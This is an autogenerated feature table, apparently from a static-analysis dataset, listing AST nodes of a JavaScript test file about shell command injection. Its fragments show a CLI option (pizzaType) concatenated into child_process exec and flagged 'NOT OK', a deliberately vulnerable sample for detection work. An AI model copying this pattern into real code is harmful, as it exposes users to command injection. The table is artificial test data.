autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:28 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:28 | program | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:28 | program | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:28 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:28 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:30:137:38 | pizzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:30:137:38 | pizzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:30:137:38 | pizzaType | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:30:137:38 | pizzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:30:137:38 | pizzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:1:147:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:1:147:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:1:147:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | cp | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | require | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | this | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:140:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | 'arguments' object of anonymous function | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | exceptional return of anonymous function | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | return of anonymous function | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:140:2:147:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:18 | { Command } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:18 | { Command } | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:18 | { Command } | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:18 | { Command } | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:18 | { Command } | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | Command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | Command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | Command | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | Command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | Command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | { Comma ... ander') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | { Comma ... ander') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | { Comma ... ander') | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | { Comma ... ander') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:8:141:41 | { Comma ... ander') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:10:141:16 | Command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:28 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:28 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:28 | require | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:28 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:28 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | exceptional return of require('commander') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | exceptional return of require('commander') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | exceptional return of require('commander') | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | exceptional return of require('commander') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | exceptional return of require('commander') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | require('commander') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | require('commander') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | require('commander') | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | require('commander') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | require('commander') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:30:141:40 | 'commander' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:30:141:40 | 'commander' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:30:141:40 | 'commander' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:30:141:40 | 'commander' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:30:141:40 | 'commander' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:30:141:40 | 'commander' | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:30:141:40 | 'commander' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:30:141:40 | 'commander' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:14 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:14 | program | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:14 | program | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:14 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:14 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program ... mmand() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program ... mmand() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program ... mmand() | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program ... mmand() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:8:142:30 | program ... mmand() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | exceptional return of new Command() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | exceptional return of new Command() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | exceptional return of new Command() | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | exceptional return of new Command() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | exceptional return of new Command() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | new Command() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | new Command() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | new Command() | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | new Command() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:18:142:30 | new Command() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:22:142:28 | Command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:22:142:28 | Command | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:22:142:28 | Command | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:22:142:28 | Command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:142:22:142:28 | Command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:8 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:8 | program | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:8 | program | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:8 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:8 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| 